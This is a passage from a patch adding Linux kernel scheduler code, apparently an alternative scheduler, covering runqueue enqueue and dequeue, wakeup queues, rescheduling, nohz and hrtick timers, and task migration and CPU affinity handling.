++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, lets send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do similar optimization for completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/**
++	 * Alt schedule FW doesn't support sched_feat yet
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	trace_sched_migrate_task(p, new_cpu);
++
++	if (task_cpu(p) != new_cpu)
++	{
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, struct affinity_context *ctx)
++{
++	cpumask_copy(&p->cpus_mask, ctx->new_mask);
++	p->nr_cpus_allowed = cpumask_weight(ctx->new_mask);
++
++	/*
++	 * Swap in a new user_cpus_ptr if SCA_USER flag set
++	 */
++	if (ctx->flags & SCA_USER)
++		swap(p->user_cpus_ptr, ctx->user_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, struct affinity_context *ctx)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, ctx);
++}
++
++/*
++ * Used for kthread_bind() and select_fallback_rq(), in both cases the user
++ * affinity (if any) should be destroyed too.
++ */
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.user_mask = NULL,
++		.flags     = SCA_USER,	/* clear the user requested mask */
++	};
++	union cpumask_rcuhead {
++		cpumask_t cpumask;
++		struct rcu_head rcu;
++	};
++
++	__do_set_cpus_allowed(p, &ac);
++
++	/*
++	 * Because this is called with p->pi_lock held, it is not possible
++	 * to use kfree() here (when PREEMPT_RT=y), therefore punt to using
++	 * kfree_rcu().
++	 */
++	kfree_rcu((union cpumask_rcuhead *)ac.user_mask, rcu);
++}
++
++static cpumask_t *alloc_user_cpus_ptr(int node)
++{
++	/*
++	 * See do_set_cpus_allowed() above for the rcu_head usage.
++	 */
++	int size = max_t(int, cpumask_size(), sizeof(struct rcu_head));
++
++	return kmalloc_node(size, GFP_KERNEL, node);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	cpumask_t *user_mask;
++	unsigned long flags;
++
++	/*
++	 * Always clear dst->user_cpus_ptr first as their user_cpus_ptr's
++	 * may differ by now due to racing.
++	 */
++	dst->user_cpus_ptr = NULL;
++
++	/*
++	 * This check is racy and losing the race is a valid situation.
++	 * It is not worth the extra overhead of taking the pi_lock on
++	 * every fork/clone.
++	 */
++	if (data_race(!src->user_cpus_ptr))
++		return 0;
++
++	user_mask = alloc_user_cpus_ptr(node);
++	if (!user_mask)
++		return -ENOMEM;
++
++	/*
++	 * Use pi_lock to protect content of user_cpus_ptr
++	 *
++	 * Though unlikely, user_cpus_ptr can be reset to NULL by a concurrent
++	 * do_set_cpus_allowed().
++	 */
++	raw_spin_lock_irqsave(&src->pi_lock, flags);
++	if (src->user_cpus_ptr) {
++		swap(dst->user_cpus_ptr, user_mask);
++		cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	}
++	raw_spin_unlock_irqrestore(&src->pi_lock, flags);
++
++	if (unlikely(user_mask))
++		kfree(user_mask);
++
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
